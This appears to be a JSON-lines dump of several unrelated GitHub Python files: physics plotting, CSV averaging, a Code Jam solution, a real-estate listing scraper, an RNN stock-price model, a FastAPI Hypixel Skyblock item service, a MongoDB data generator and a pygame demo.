termfinal, term1, term2, term3 = DQRabi_frqdiff(arr_t, rabi, detuning)\n# plt.plot(arr_t, termfinal, 'k--', lw=2, label='DQ Rabi')\n# plt.axvline(get_DQhalfpi(rabi, detuning)[0], c='r', lw=2, label = '$t_1$')\n# plt.axvline(get_DQhalfpi(rabi, detuning)[1], c='b', lw=2, label = '$t_2$')\n \n# #termfinal, term1, term2, term3 = DQRabi_frqdiff2(arr_t, 2.15, detuning)\n# #plt.plot(arr_t, termfinal, 'rx:', label='total')\n# #plt.plot(arr_t, term1, '--', label='term 1')\n# #plt.plot(arr_t, term2*np.ones(arr_t.size), ':', label='term 2')\n# #plt.plot(arr_t, term3, '-.', label='term 3')\n# plt.ylim([0,1])\n# plt.xlabel('Pulse Duration ($\\mu s$)', fontsize=20)\n# plt.ylabel('$m_s = 0$ Population', fontsize=20)\n# str_title = 'DQ Rabi \\n'\n# str_title += 'Driving Amp: ' + str(round(rabi, 4)) + ' MHz, '\n# str_title += 'Detunings: $\\pm$' + str(round(detuning, 4)) + ' MHz'\n# plt.title(str_title , fontsize = 25)\n# #plt.savefig('./difdetun/' + str(int(idx_detun)) + '.png',dpi=100)\n# plt.legend(loc=3, fontsize=15)\n# #plt.close()\n# plt.show()\n# #plt.close()\n\n","repo_name":"jstangnv/NV_HyperfineDriving","sub_path":"BaseScripts_by_JJ/dqdifdetun.py","file_name":"dqdifdetun.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41592924101","text":"import csv\n\n# Average income\n# income = 0\n# with open(\"C:/images/csv/Emp.csv\") as rfp:\n# lines = rfp.readlines()\n# for line in lines[1:]:\n# line = line.strip()\n# line = line.split(',')\n# income += int(line[-1])\n#\n# print(income / (len(lines)-1))\n\nwith open(\"C:/images/csv/Emp.csv\") as rfp:\n reader = csv.reader(rfp)\n headerList = next(reader)\n sum = 0\n count = 0\n for cList in reader:\n sum += int(cList[3])\n count += 1\n avg = sum // count\n print(avg)\n\n\n","repo_name":"Roasters/ComputerVision","sub_path":"09- CSV 01.py","file_name":"09- CSV 01.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23543909231","text":"def check(S):\n for s in S:\n if s == -1:\n return False\n return True\n\n\nt = int(input())\nfor i in range(1, t + 1):\n raw = [str(s) for s in input().split(\" \")]\n S = list(raw[0])\n S = [-1 if s == '-' else 1 for s in S]\n K = int(raw[1])\n\n flip = 0\n index = 0\n for useless_i in range(len(S)):\n if index + K > len(S):\n flip = flip if check(S) else 'IMPOSSIBLE'\n break\n\n cur = S[index]\n if cur == -1:\n for ii in range(K):\n try:\n S[index + ii] = -1 * S[index + ii]\n except Exception:\n pass\n index += 1\n flip += 1\n else:\n index += 1\n\n print(\"Case #{}: {}\".format(i, flip))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2595.py","file_name":"2595.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15655551483","text":"\ndef get_even_lines_from_text_file(file_name):\n with open(file_name) as file:\n lines = file.readlines()\n result = [lines[i][:-1] for i in range(len(lines)) if i % 2 == 0]\n\n return result\n\n\ndef replace_special_chars_with_at_symbol(lines):\n for i in range(len(lines)):\n for char in special_chars:\n if char in lines[i]:\n lines[i] = lines[i].replace(char, special_symbol)\n\n\ndef change_word_order(lines):\n result = [line.split()[::-1] for line in lines]\n return result\n\n\ndef format_lines(lines):\n replace_special_chars_with_at_symbol(lines)\n result = change_word_order(lines)\n\n return result\n\ndef print_result(lines):\n for line in lines:\n print(\" \".join(line))\n\nspecial_chars = [\"-\", \",\", \".\", \"!\", \"?\"]\nspecial_symbol = \"@\"\nlines = get_even_lines_from_text_file(\"text.txt\")\nformatted_lines = format_lines(lines)\nprint_result(formatted_lines)","repo_name":"geodimitrov/Python-Advanced-SoftUni","sub_path":"File-Handling/Exercises/01. even_lines.py","file_name":"01. even_lines.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11198649134","text":"from bs4 import BeautifulSoup\r\nfrom Constants import ELEMENTS_POST as EP, TYPE_OF_DEAL as TOD, RE_SELL, RE_RENT, URL_RENT, URL_SELL, URL_BASE\r\nimport urllib.request\r\nfrom datetime import datetime\r\nimport re\r\nimport threading\r\n\r\n\r\ndef address(street: str):\r\n \"\"\"\r\n Takes a street address and divides it into two parts - street name and\r\n number.\r\n \"\"\"\r\n try:\r\n return [re.findall(\"(.+) [0-9]+\", street)[0], re.findall(\".+ ([0-9]+)\", street)[0]]\r\n except IndexError:\r\n return [re.findall(\"(.+) .+\", street)[0], \"NA\"]\r\n\r\n\r\ndef reformat_date(d: str):\r\n \"\"\"\r\n Reformat date from DD.MM.YYYY to YYYY-MM-DD\r\n \"\"\"\r\n return f\"{d.split('.')[2]}-{d.split('.')[1]}-{d.split('.')[0]}\"\r\n\r\n\r\nclass RealEstate:\r\n \"\"\"\r\n Stores data about an apartment.\r\n \"\"\"\r\n def __init__(self, method: str, **kwargs):\r\n \"\"\"\r\n method:\r\n 'FromLink': must contain keyword argument 'link' which is SS.lv URL.\r\n 'Manual': all fields about apartment enetered manually. Keyword\r\n arguments expected: price (float), size (float), street (str),\r\n strnum (str), district (str), series (str),\r\n link (str), typeofdeal (str value 'rent' or 'sell'),\r\n amenities (str), upload_date (str), import_date (str), floor (int),\r\n building (str)\r\n \"\"\"\r\n self.import_date = str(datetime.now())[:10]\r\n if method == \"FromLink\":\r\n self.link = kwargs[\"link\"]\r\n soup = BeautifulSoup(urllib.request.urlopen(self.link).read(), \"html.parser\")\r\n self.typeofdeal = TOD[soup.find_all(name=\"h2\", attrs={\"class\": \"headtitle\"})[0].get_text().split(\"/\")[-1].strip()][1]\r\n self.price = self.pricetag(soup.find_all(name=EP[\"Price\"][\"Tag\"], attrs={\"id\": EP[\"Price\"][\"id\"]})[0].get_text())\r\n self.size = float(soup.find_all(name=EP[\"Size\"][\"Tag\"], attrs={\"id\": EP[\"Size\"][\"id\"]})[0].get_text().split(\"m\")[0].replace(\" \", \"\"))\r\n self.series = soup.find_all(name=EP[\"Series\"][\"Tag\"], attrs={\"id\": EP[\"Series\"][\"id\"]})[0].get_text()\r\n self.district = soup.find_all(name=EP[\"District\"][\"Tag\"], attrs={\"id\": EP[\"District\"][\"id\"]})[0].get_text()\r\n self.street = address(soup.find_all(name=EP[\"Street\"][\"Tag\"], attrs={\"id\": EP[\"Street\"][\"id\"]})[0].get_text().replace(\" [Karte]\", \"\"))[0]\r\n self.strnum = address(soup.find_all(name=EP[\"Street\"][\"Tag\"], attrs={\"id\": EP[\"Street\"][\"id\"]})[0].get_text().replace(\" [Karte]\", \"\"))[1]\r\n try:\r\n self.amenities = soup.find_all(name=EP[\"Amenities\"][\"Tag\"], attrs={\"id\": EP[\"Amenities\"][\"id\"]})[0].get_text()\r\n except IndexError:\r\n self.amenities = \"NA\"\r\n self.upload_date = reformat_date(soup.find_all(name=\"td\", attrs={\"class\": \"msg_footer\", \"align\": \"right\"})[0].get_text()[8:18])\r\n self.floor = int(soup.find_all(name=EP[\"Floor\"][\"Tag\"], attrs={\"id\": EP[\"Floor\"][\"id\"]})[0].get_text().split(\"/\")[0])\r\n try:\r\n self.building = soup.find_all(name=EP[\"Building\"][\"Tag\"], attrs={\"id\": EP[\"Building\"][\"id\"]})[0].get_text()\r\n except IndexError:\r\n self.building = \"NA\"\r\n elif method == \"Manual\":\r\n self.price = kwargs[\"price\"]\r\n self.size = kwargs[\"size\"]\r\n self.street = kwargs[\"street\"]\r\n self.strnum = kwargs[\"strnum\"]\r\n self.district = kwargs[\"district\"]\r\n self.series = kwargs[\"series\"]\r\n self.link = kwargs[\"link\"]\r\n self.typeofdeal = kwargs[\"typeofdeal\"]\r\n self.amenities = kwargs[\"amenities\"]\r\n self.upload_date = kwargs[\"upload_date\"]\r\n self.floor = kwargs[\"floor\"]\r\n self.building = kwargs[\"building\"]\r\n\r\n def per_sqm(self):\r\n \"\"\"\r\n Calculates price per square meter.\r\n \"\"\"\r\n return round(self.price / self.size, 5)\r\n\r\n def pricetag(self, price_des: str):\r\n \"\"\"\r\n Extracts the exact price from price description, e.g. '50 000 €'\r\n and returns as an integer value.\r\n \"\"\"\r\n if self.typeofdeal == \"rent\":\r\n if \"€/mēn.\" not in price_des:\r\n raise ValueError(\"Invalid pricetag for typeofdeal RE_RENT. Tag '€/mēn.' not found.\")\r\n return float(price_des.split(\"€/mēn.\")[0].strip().replace(\" \", \"\"))\r\n elif self.typeofdeal == \"sell\":\r\n return float(price_des.split(\"€\")[0].strip().replace(\" \", \"\"))\r\n\r\n\r\ndef find_all_rows(bs: BeautifulSoup):\r\n \"\"\"\r\n bs: BeautifulSoup object containing table with apartments\r\n https://www.ss.lv/lv/real-estate/flats/riga/all/hand_over/pageXX.html\r\n return value: tuple containing id attribute for all relevant tags.\r\n Each id points to an apartment posting.\r\n \"\"\"\r\n plain_text = bs.prettify(encoding=\"utf-8\")\r\n return re.findall(\"tr_[0-9]+\", str(plain_text))\r\n\r\n\r\ndef get_links(typeofdeal: int):\r\n \"\"\"\r\n Gathers all available links for:\r\n typeofdeal 0: apartments for sale, 1: apartments for rent\r\n \"\"\"\r\n if typeofdeal not in [RE_SELL, RE_RENT]: return -1\r\n base_url = URL_RENT if typeofdeal == RE_RENT else URL_SELL\r\n return_list = []\r\n page = 1\r\n end_of_data = False\r\n while not end_of_data:\r\n # print(f\"Collecting links from page {page}...\")\r\n current_url = f\"{base_url}page{str(page)}.html\" if page != 1 else base_url\r\n table_soup = BeautifulSoup(urllib.request.urlopen(current_url), \"html.parser\")\r\n rows = find_all_rows(table_soup)\r\n for row in rows:\r\n # print(list(table_soup.find_all(name='tr', attrs={'id': row})[0].children)[-1].get_text())\r\n if typeofdeal == RE_RENT and '€/mēn.' not in list(table_soup.find_all(name='tr', attrs={'id': row})[0].children)[-1].get_text():\r\n continue\r\n return_list.append(f\"{URL_BASE}{table_soup.find_all(name='tr', attrs={'id': row})[0].find_all(name='a')[0]['href']}\")\r\n next_page = table_soup.find_all(name=\"a\", attrs={\"class\": \"navi\"})[-1][\"href\"]\r\n try:\r\n page = int(re.findall(\"page([0-9]+)\\.html\", next_page)[0])\r\n except IndexError:\r\n end_of_data = True\r\n return return_list\r\n\r\n\r\ndef get_data(links: list, re_list: list, **kwargs):\r\n \"\"\"\"\r\n Takes a list of links and creates RealEstate objects.\r\n links: a list containing links to specific post in SS.\r\n re_list: a list that will hold the RealEstate objects created by this method.\r\n **kwargs: optional arguments for updating the status of current data import in real time. Use either both or none\r\n of the arguments below.\r\n total: total number of links to be processed\r\n status_info: a dictionary containing key 'ImportProgress'\r\n \"\"\"\r\n try:\r\n update_status = True if \"total\" in kwargs and \"status_info\" in kwargs and \"ImportProgress\" in kwargs[\"status_info\"] else False\r\n except KeyError as keyerror:\r\n print(keyerror)\r\n update_status = False\r\n for url in links:\r\n try:\r\n re_list.append(RealEstate(\"FromLink\", link=url))\r\n except ValueError:\r\n continue\r\n if update_status:\r\n kwargs[\"status_info\"][\"ImportProgress\"] = round(len(re_list)/kwargs[\"total\"]*100, 2)\r\n # print(f\"Progress: {str(kwargs['status_info']['ImportProgress'])}, {str(len(re_list))} / {str(kwargs['total'])}\")\r\n\r\n\r\ndef get_data_quickly(typeofdeal: int, threads: int, **kwargs):\r\n \"\"\"\"\r\n A threaded version of get_data which equally distributes all SS links among the number of threads specified.\r\n typeofdeal: 0 (sell) or 1 (rent)\r\n threads: number of threads to distribute the workload\r\n **kwargs: optional arguments for updating the status of current data import in real time.\r\n status_info: a dictionary containing key 'ImportProgress'\r\n return_list: an existing list outside of this method to store RealEstate objects\r\n \"\"\"\r\n update_status = True if \"status_info\" in kwargs else False\r\n return_list = []\r\n thread_list = []\r\n all_links = get_links(typeofdeal)\r\n links_per_thread = len(all_links) // threads\r\n remainder = len(all_links) % threads\r\n for t in range(threads):\r\n end_pos = links_per_thread * (t + 1)\r\n if t + 1 == threads:\r\n end_pos += remainder\r\n if update_status:\r\n thread_list.append(threading.Thread(target=get_data, args=(all_links[links_per_thread * t:end_pos], return_list), kwargs={\"status_info\": kwargs[\"status_info\"], \"total\": len(all_links)}))\r\n else:\r\n thread_list.append(threading.Thread(target=get_data, args=(all_links[links_per_thread * t:end_pos], return_list)))\r\n for t in thread_list:\r\n t.start()\r\n for t in thread_list:\r\n t.join()\r\n if \"return_list\" in kwargs:\r\n kwargs[\"return_list\"] = return_list\r\n else:\r\n return return_list\r\n\r\n\r\ndef export_to_txt(source: list, filename: str):\r\n \"\"\"\r\n Export source list of RealEstate objects to a text file.\r\n \"\"\"\r\n with open(f\"{filename}.txt\", \"w+\", encoding=\"utf-8\") as OutputFile:\r\n OutputFile.write(\"Price\\tSize\\tStreet\\tStrNum\\tDistrict\\tSeries\\tLink\\tImportDate\\tTypeOfDeal\\tAmenities\\tUploadDate\\tFloor\\tBuilding\\n\")\r\n for i in source:\r\n OutputFile.write(f\"{str(i.price)}\\t{str(i.size)}\\t{str(i.street)}\\t{str(i.strnum)}\\t{str(i.district)}\\t{str(i.series)}\\t{str(i.link)}\\t{str(i.import_date)}\\t{str(i.typeofdeal)}\\t{str(i.amenities)}\\t{str(i.upload_date)}\\t{str(i.floor)}\\t{str(i.building)}\\n\")\r\n\r\n\r\ndef import_from_txt(filename: str):\r\n \"\"\"\r\n Creates a list of RealEstate objects from a text file.\r\n Text file should be tab delimited and should contain the following header:\r\n Price\\tSize\\tStreet\\tStrNum\\tDistrict\\tSeries\\tLink\\tImportDate\\tTypeOfDeal\\tAmenities\\tUploadDate\\tFloor\\tBuilding\\n\r\n \"\"\"\r\n return_list = []\r\n with open(f\"{filename}.txt\", \"r\", encoding=\"utf-8\") as SourceFile:\r\n source_list = SourceFile.read().split(\"\\n\")\r\n for i in range(1, len(source_list)-1):\r\n split_line = source_list[i].split(\"\\t\")\r\n return_list.append(RealEstate(\"Manual\", price=split_line[0], size=split_line[1], street=split_line[2], strnum=split_line[3], district=split_line[4], series=split_line[5], link=split_line[6], typeofdeal=split_line[8], amenities=split_line[9], upload_date=split_line[10], floor=split_line[11], building=split_line[12]))\r\n return return_list\r\n","repo_name":"baumanis/RealEstateFeed","sub_path":"RealEstateFeed.py","file_name":"RealEstateFeed.py","file_ext":"py","file_size_in_byte":10551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15065483716","text":"import yfinance as yf \nimport pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt \nimport warnings \nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.layers import Dense, SimpleRNN\nfrom sklearn.model_selection import KFold\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom keras.models import Sequential\nfrom keras.callbacks import EarlyStopping\nimport tensorflow as tf\n\nwarnings.filterwarnings('ignore')\n\ngoog = yf.Ticker('GOOGL')\ngoog_6y = goog.history(period='6y')\n\n# Data that I want to focus on are 'Open','High','Low','Closing', and Volume\ngoog = goog_6y.iloc[:,0:5]\n\n# Diagnose whether there are null data \ngoog.isnull().sum()\n\n\n# This time, let's divide data into train and test. The train ratio is 0.7\ntrain_ratio = 0.7\ntrain_len = int(train_ratio * goog.shape[0])\ntrain_stock = goog[:train_len]\ntest_stock = goog[train_len:]\n\n# Do scaling train data by using MinMaxScaler \ntrain = train_stock.copy()\nscalers = {}\nfor i in train_stock.columns:\n scaler = MinMaxScaler(feature_range=(-1,1))\n s_s = scaler.fit_transform(train[i].values.reshape(-1,1))\n scalers['scaler_'+i]=scaler\n train[i] = s_s\n\n# Likewise, do scaling test data too\ntest = test_stock.copy()\nfor i in train_stock.columns:\n scaler = scalers['scaler_'+i]\n s_s = scaler.transform(test[i].values.reshape(-1,1))\n test[i] = s_s\n\n# Next, the below function is for making time series data. \ndef split_series(series, n_past,n_future,target_col=list(range(len(goog.columns)))):\n X, y = list(), list()\n for window_start in range(len(series)):\n past_end = window_start + n_past\n future_end = past_end + n_future\n if future_end > len(series):\n break\n past, future = series[window_start:past_end,:], series[past_end:future_end,target_col]\n X.append(past)\n y.append(future)\n return np.array(X), np.array(y)\n\nn_features = train.shape[1] # 5 \nn_past = 22\nn_future = 1\n\nX_train, y_train = split_series(train.values,n_past,n_future, target_col=goog.columns.get_loc('Close'))\n\ntest_rnn = pd.concat([train[-n_past:],test])\n\n\nX_test, y_test = split_series(test_rnn.values, n_past,n_future, target_col=goog.columns.get_loc('Close') )\n\n\ndef build_rnn(n_neurons):\n model = Sequential()\n model.add(SimpleRNN(units=n_neurons, activation='tanh', input_shape=(n_past, n_features)))\n model.add(Dense(1, activation='tanh'))\n model.compile(loss='mse',optimizer=tf.keras.optimizers.RMSprop(0.001), metrics=['mse'])\n return model\n\nkfold = KFold(n_splits = 3)\n\nn_neurons = [10, 20, 30]\nparam_grid = dict(n_neurons=n_neurons)\n\nmodel_candi = KerasRegressor(build_fn = build_rnn)\ngrid_rnn = RandomizedSearchCV(estimator=model_candi, cv=kfold, param_distributions=param_grid)\n\ngrid_rnn.fit(X_train, y_train, epochs=50, batch_size=20, verbose=0)\n\nbest_rnn = grid_rnn.best_estimator_\n\nes = EarlyStopping(monitor='val_loss', mode='min', patience=5)\nhistory_rnn = best_rnn.fit(X_train, y_train, epochs=50, batch_size=20, validation_split=0.2, callbacks=[es],\n verbose=0)\n\ntrain_mse = history_rnn.history['mse']\nvalid_mse = history_rnn.history['val_mse']\n\nplt.plot(train_mse, label='train mse')\nplt.plot(valid_mse, label='validation mse')\nplt.ylabel('mse')\nplt.xlabel('epoch')\nplt.legend(loc='upper center', bbox_to_anchor=(0.5,-0.15), fancybox=True, shadow=False, ncol=2)\n","repo_name":"minhokg/RNN_Google_Stock","sub_path":"Simple_RNN_Google.py","file_name":"Simple_RNN_Google.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13583874824","text":"from fastapi import FastAPI\nfrom fastapi.responses import RedirectResponse, FileResponse\nfrom fastapi.concurrency import run_in_threadpool\nfrom fastapi.openapi.docs import get_swagger_ui_html\nfrom fastapi_utils.tasks import repeat_every\nimport main\nimport models\nimport uvicorn\nimport uvloop\nimport asyncio\nimport aiofiles\nimport json\nimport logging_setup\nimport urllib.request\n\ndescription = \"\"\"\nThe Skyblock Tools api tries to put all information a hypixel dev using the api would need at their fingertips\n## Items\nProvides an interface to **see all data about all items, data for a specific item or specific data generally.**\nCreate an issue on github (https://github.com/QuintBrit/Skyblock-Tools/issues) if you need help or run into an error!\n\"\"\"\n\ntags_metadata = [{\n \"name\":\n \"items\",\n \"description\":\n \"Operations dealing with ✧・゚individual items✧・゚\"\n}, {\n \"name\":\n \"constants\",\n \"description\":\n \"Constant lists of things, such as what items are auctionable.\"\n}, {\n \"name\": \"simplified\",\n \"description\": \"Simplifying complex endpoints for dev use\"\n}, {\n \"name\": \"flippers\",\n \"description\": \"Provides data for flipping\"\n}]\n\nlogger = logging_setup.setup() # sets up config logging\n\napp = FastAPI(\n title=\"Skyblock Tools\",\n description=description,\n version=\"1.0.1\",\n openapi_tags=tags_metadata,\n license_info={\n \"name\": \"GNU General Public License v3.0\",\n \"url\": \"https://choosealicense.com/licenses/gpl-3.0/\",\n },\n)\n\nfavicon_path = './static/favicon.ico'\n\n\n@app.get(\"/\", include_in_schema=False)\nasync def home():\n return RedirectResponse(\"/docs\")\n\n\n@app.get(\"/favicon.ico\", include_in_schema=False)\nasync def favicon():\n return FileResponse(favicon_path)\n\n\n@app.get(\"/api\", include_in_schema=False)\nasync def api():\n return main.get_json(\"https://api.hypixel.net/resources/skyblock/items\")\n\n\n@app.get(\"/auction_api?page={page}\", include_in_schema=False)\nasync def auction_api():\n return main.get_json(\n \"https://api.hypixel.net/skyblock/auctions?page={page}\")\n\n\n@app.get(\"/items/items/\", tags=[\"items\"], response_model=models.Items)\nasync def items() -> models.Items:\n return db\n\n\n@app.get(\"/items/item/{item}/\", tags=[\"items\"], response_model=models.Item)\nasync def item(item: str) -> models.Item:\n return db[item]\n\n\n@app.get(\"/items/item/{item}/name/\",\n tags=[\"items\"],\n response_model=models.Name)\nasync def name(item: str) -> models.Name:\n return models.Name(id=item, name=db[item][\"name\"])\n\n\n@app.get(\"/items/item/{item}/image/\", tags=[\"items\"])\nasync def image(item: str):\n \"\"\"\n Get an item's image.\n\n :param item: The item's id.\n :return: The item's image.\n \"\"\"\n try:\n image, _ = urllib.request.urlretrieve(db[item][\"image_link\"],\n \"./static/assets/image.png\")\n except urllib.error.HTTPError:\n image, _ = urllib.request.urlretrieve(db[item][\"alt_image_link\"],\n \"./static/assets/image.png\")\n logger.warning(f\"Failed to download image for item {item}\")\n return FileResponse(image)\n\n\n@app.get(\"/items/item/{item}/recipe/\",\n tags=[\"items\"],\n response_model=models.Recipe)\nasync def recipe(item: str) -> models.Recipe:\n if db[item][\"craftable\"] or db[item][\"forgable\"]:\n return models.Recipe(recipe=db[item][\"recipe\"],\n ingredients=db[item][\"ingredients\"])\n else:\n logger.warning(f\"Item {item} is not craftable or forgable\")\n return {\"craftable\": False, \"forgable\": False}\n\n\n@app.get(\"/items/item/{item}/lowest_bin/\",\n tags=[\"items\"],\n response_model=models.Bins)\nasync def lowest_bin(item: str) -> models.Bins:\n if db[item].get(\"auctionable\") == True:\n return models.Bins(lowest=db[item][\"lowest_bin\"],\n second_lowest=db[item][\"second_lowest_bin\"])\n else:\n logger.warning(f\"Item {item} is not auctionable\")\n return {\"auctionable\": False}\n\n\n@app.get(\"/items/item/{item}/auctions/\",\n tags=[\"items\"],\n response_model=models.Auctions)\nasync def item_auctions(item: str):\n auctions = await main.get_auctions()\n auctions = [d for d in auctions if d[\"id\"] == item]\n return auctions\n\n\n@app.get(\"/items/item/{item}/bazaar/\",\n tags=[\"items\"],\n response_model=models.BazaarItem)\nasync def bazaar(item: str):\n if db[item].get(\"bazaarable\") == True:\n return models.BazaarItem(\n buy=db[item][\"bazaar_buy_price\"],\n sell=db[item][\"bazaar_sell_price\"],\n profit=db[item][\"bazaar_profit\"],\n percentage_profit=db[item][\"bazaar_percentage_profit\"])\n else:\n logger.warning(f\"Item {item} is not bazaarable\")\n return {\"bazaarable\": False}\n\n\n@app.get(\"/items/item/{item}/price/\",\n tags=[\"items\"],\n response_model=models.Price)\nasync def price(item: str):\n if db[item].get(\"bazaarable\") == True:\n return models.Price(\n buy=db[item][\"bazaar_buy_price\"],\n sell=db[item][\"bazaar_sell_price\"],\n profit=db[item][\"bazaar_profit\"],\n percentage_profit=db[item][\"bazaar_percentage_profit\"])\n\n elif db[item].get(\"auctionable\") == True:\n return models.Price(\n buy=db[item][\"lowest_bin\"],\n sell=db[item][\"second_lowest_bin\"],\n profit=db[item][\"bin_flip_profit\"],\n percentage_profit=db[item][\"bin_flip_percentage_profit\"])\n\n elif db[item].get(\"npc_salable\") == True:\n return models.Price(sell=db[item][\"npc_sell_price\"])\n\n else:\n logger.warning(f\"Item {item} is not sellable\")\n return {\"unsellable\": True}\n\n\n@app.get(\"/items/item/{item}/forge/\",\n tags=[\"items\"],\n response_model=models.ForgeItem)\nasync def forge(item: str):\n if db[item].get(\"forgable\") == True:\n return models.ForgeItem(\n cost=db[item][\"forge_cost\"],\n profit=db[item][\"forge_profit\"],\n duration=db[item][\"duration\"],\n pretty_duration=db[item][\"pretty_duration\"],\n profit_per_hour=db[item][\"forge_profit_per_hour\"],\n percentage_profit=db[item][\"forge_percentage_profit\"],\n recipe=db[item][\"recipe\"],\n ingredients=db[item][\"ingredients\"])\n else:\n logger.warning(f\"Item {item} is not forgable\")\n return {\"forgable\": False}\n\n\n@app.get(\"/constants/bazaarables/\", tags=[\"constants\"], response_model=list)\nasync def bazaarables():\n bazaarables = [item for item in db if db[item][\"bazaarable\"]]\n return bazaarables\n\n\n@app.get(\"/constants/auctionables/\", tags=[\"constants\"], response_model=list)\nasync def auctionables():\n auctionables = [item for item in db if db[item][\"auctionable\"]]\n return auctionables\n\n\n@app.get(\"/constants/craftables/\", tags=[\"constants\"], response_model=list)\nasync def craftables():\n craftables = [item for item in db if db[item][\"craftable\"]]\n return craftables\n\n\n@app.get(\"/constants/forgables/\", tags=[\"constants\"], response_model=list)\nasync def forgables():\n forgables = [item for item in db if db[item][\"forgable\"]]\n return forgables\n\n\n@app.get(\"/simplified/auctions/\",\n tags=[\"simplified\"],\n response_model=models.Auctions)\nasync def auctions(page: int = 0):\n auctions = await main.get_auctions()\n auctions = list(main.chunks(auctions, 5000))\n logger.info(f\"Got auctions page {page}\")\n return auctions[page]\n\n\n@app.get(\"/flippers/bazaar/\", tags=[\"flippers\"], response_model=list)\nasync def bazaar_flipper():\n return main.bazaar_flipper()\n\n\n@app.get(\"/flippers/bazaar/html/\", tags=[\"flippers\"], response_model=str)\nasync def bazaar_flipper_html():\n return main.build_table(main.bazaar_flipper()[0],\n main.bazaar_flipper()[1],\n \"./templates/bazaar_flipper_data.html\")\n\n\n@app.get(\"/flippers/craft/\", tags=[\"flippers\"], response_model=list)\nasync def craft_flipper():\n return main.craft_flipper()\n\n\n@app.get(\"/flippers/craft/html/\", tags=[\"flippers\"], response_model=str)\nasync def craft_flipper_html():\n return main.build_table(main.craft_flipper()[0],\n main.craft_flipper()[1],\n \"./templates/craft_flipper_data.html\")\n\n\n@app.get(\"/flippers/forge/\", tags=[\"flippers\"], response_model=list)\nasync def forge_flipper():\n return main.forge_flipper()\n\n\n@app.get(\"/flippers/forge/html/\", tags=[\"flippers\"], response_model=str)\nasync def forge_flipper_html():\n return main.build_table(main.forge_flipper()[0],\n main.forge_flipper()[1],\n \"./templates/forge_flipper_data.html\")\n\n\n@app.get(\"/flippers/bin/\", tags=[\"flippers\"], response_model=list)\nasync def bin_flipper():\n return main.bin_flipper()\n\n\n@app.get(\"/flippers/bin/html/\", tags=[\"flippers\"], response_model=str)\nasync def bin_flipper_html():\n return main.build_table(main.bin_flipper()[0],\n main.bin_flipper()[1],\n \"./templates/bin_flipper_data.html\")\n\n\n@repeat_every(seconds=60 * 2, wait_first=True, logger=logger)\nasync def dynamic_database_updater_task():\n global db\n logger.info(\"Dynamic database update\")\n db = await run_in_threadpool(\n lambda: main.dynamic_database_updater(db, main.names))\n\n\n@repeat_every(seconds=60 * 60, wait_first=True, logger=logger)\nasync def static_database_updater_task():\n global db\n logger.info(\"Static database update\")\n db = await run_in_threadpool(\n lambda: main.static_database_updater(main.names))\n\n\n@app.on_event(\"startup\")\nasync def load_db():\n global db\n async with aiofiles.open(\"./data/database.json\", \"r\") as database:\n database = await database.read()\n db = json.loads(database)\n\n\nuvloop.install()\n\nif __name__ == \"__main__\":\n uvicorn.run(\"app:app\", host='0.0.0.0', port=8080)\n","repo_name":"socalledtheraven/Skyblock-Tools","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74714726915","text":"import datetime\nimport pymongo\nfrom random import randrange, randint\n\nclass Stock:\n def __init__(self, _id):\n self._id = _id\n self.magasin = \"MAG\" + str(randint(1,10))\n self.quantite = randint(0, 1000)\n self.active = bool(randint(0,1))\n self.idProduit = randint(0, 100000)\n self.creationDate = self.random_date().strftime('%Y-%m-%dT%H:%M:%S.000+0000')\n\n def random_date(self):\n start = datetime.datetime(randint(1980, datetime.datetime.now().year),\n randint(1, 12),\n 1, 0, 0, 0)\n res = start + datetime.timedelta(days=randrange(30),\n hours=randrange(24),\n minutes=randrange(60),\n seconds=randrange(60))\n return res\n\n def __str__(self):\n return \"stock : [\" + str(self.idStock) \\\n + \", \" + str(self.magasin) \\\n + \", \" + str(self.quantite) \\\n + \", \" + str(self.active) \\\n + \", \" + str(self.idProduit) \\\n + \", \" + str(self.creationDate) + \"]\"\n\nclient = pymongo.MongoClient(\"192.168.99.101\", 27017) ## driver connector to the mongodb container docker\ndatabase = client[\"apiStock\"] ## target database name\ncollection = database[\"stock\"] ## target collection\nfor i in range(1, 500001):\n try:\n line = Stock(i).__dict__\n collection.insert_one(line)\n print(line.__str__())\n except:\n collection.update(line)","repo_name":"AlexandreGuil/microservice-stock","sub_path":"microservices-api/spring-reactive-mongoapi-stock/target/classes/getDatasetStockJson.py","file_name":"getDatasetStockJson.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74282349633","text":"import sys,os\r\nimport pygame\r\n\r\npath = os.path.dirname(__file__)\r\nos.chdir(path)\r\n\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((500,403))\r\n\r\nimg = pygame.image.load('fhcq.jpg')\r\nsurface = pygame.Surface((500,403),pygame.SRCALPHA)\r\npygame.draw.circle(surface,(255,105,180,100),(500//2,403//2),403//2)\r\n\r\n\r\nwhile True:\r\n screen.blit(img,(0,0))\r\n screen.blit(surface,(0,0))\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n \r\n 